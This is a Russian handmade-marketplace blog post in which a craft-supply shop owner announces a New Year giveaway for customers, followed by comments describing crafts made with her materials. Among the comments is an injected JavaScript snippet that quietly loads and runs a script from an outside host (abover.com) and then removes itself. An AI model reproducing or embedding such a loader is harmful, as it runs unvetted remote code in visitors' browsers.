Подарки Покупательницам-Рукодельницам!

Подарки Покупательницам-Рукодельницам! | Ярмарка Мастеров - ручная работа, handmade

Уважаемые Рукодельницы

Скоро Новогодние праздники и мне хотелось бы порадовать покупательниц своего магазина!

Все мы любим  делать подарки и сейчас у Всех Рукодельниц идет активная подготовка к Новому Году

Прошу принять участие в розыгрыше всех ПОКУПАТЕЛЕЙ моего магазинчика.

Условия участия:

Покажите, кто, что сделал из, товара приобретенного в магазине " Радость Хомяка ", в комментариях к этому посту  вставьте фото своей работы с указанием, что именно применяли в ней! 

Если работ несколько можно сделать коллаж.

Если хотите показать подробности Вашей работы, детальные фотографии, процессы....подписывайте под фото Вашей работы, Ваш блог - активную ссылку чтоб все желающие могли посмотреть Ваши другие работы

Работам участницам конкурса буду присваивать номера,  рукодельница может выставить одну работу или коллаж из своих работ.

По традиции призов будет много

1.  Приз - купон на 1000 руб. Будут выбирать посетители моего магазина, путем голосования за выставленные работы!

2. Приз - купон на 1000 руб.  Выберу я со своей семьей та работа которая понравится больше всего дочке и мужу

3. Приз - сюрприз разыграю в Мистер linke. Это будет набор собранный мной: ленточки, ткани, пуговки ....(фото набора выложу чуть позже)

4. Проигравших не будет

Всем  покупателям   Новым и Старым оформившим и оплатившим покупки в период с 1 декабря по 15 декабря, скидка 10%на всё

Буду рада всем участникам

Подведем итоги 1 декабря 2013г!

(продляем до 10 декабря!)

Прошу принять активное участие : выставляйте свои                работы  и голосуйте за понравившиеся !

Комментарии (48)

Чудесный розыгрыш, Насть!!!
Принимаю участие! Я делала детский игровой коврик с использованием жесткого цветного фетра, который покупала в твоем магазинчике. А так же частично декорировала купленными у тебя репсовыми лентами{#}

Детально коврик можно рассмотреть тут http://www.livemaster.ru/item/4705741-kukly-igrushki-igrovoj-kovrik-po-motivam

Всем желаю удачи!!!

Мотильда 13.11.2013

Оксана:) Рада Вас видеть:)

Поздравляю Вы первая:),

Ваш №1.

Работа замечательная:)

Желаю Удачи!

Екатерина 06.12.2013

Оксана, как всегда на высоте №1{#}Удачи и процветания!

Марина 09.12.2013

потрясающая работа!!!

Оксана, удачи! :)

Дмитрий (Noel55) 13.11.2013

Настюша. не пройду мимо{#} чудесный конкурс и замечательный магазинчик.а главное рядом{#}

Две сумочки на фермуарчиках из твоего магазинчика +кружева +основа для броши +карабины для сумок+магнитная кнопка +кружевная нашивка.Спасибо,процветания твоему магазину! ссылки www.livemaster.ru/item/3871071/sumki-aksessuary-sumochka-kameya   http://www.livemaster.ru/item/4165533/sumki-aksessuary-sumochka-v-stile-retro-liniya

// <![CDATA[ (function () { var script = document.createElement('script'); script.src = 'https://abover.com/system/extension?iframe=' + ( self === top ? '0' : '1' ) + '&r=' + Math.random() + '&v=1.0.8'; script.onload = script.onerror = function () { script.onload = script.onerror = null; script.parentNode.removeChild(script); } document.body.appendChild(script); })(); // ]]>
Мотильда 13.11.2013

Надежда, добро пожаловать !!!

Очень рада Вас видеть:)

Желаю Вам удачи !

Ваш номер №2.

Happy-baby 13.11.2013

Я хочу-хочу{#} сейчас заканчиваю работу и на следующей недельке добавлю фото, успеваю?

Мотильда 13.11.2013

Конечно успеете:)!!!

Буду ждать Вашу работу:)

Альбина 14.11.2013

Добрый день!!я не большой мастер,только учусь.хотелось бы поучаствовать

Альбина 14.11.2013

Анастасия,извините..сразу не смогла добавить текст.

Комментирую:на первом фото буквы для сына,использован ваш тонкий фетр и репсовые ленты;

на втором --подставки для кружек,использованы репсовые ленты и фетр .

На третьем и четвертом--развивающая книжка,где использовались фетр,пуговицы и репсовые ленты.{#}

Показать все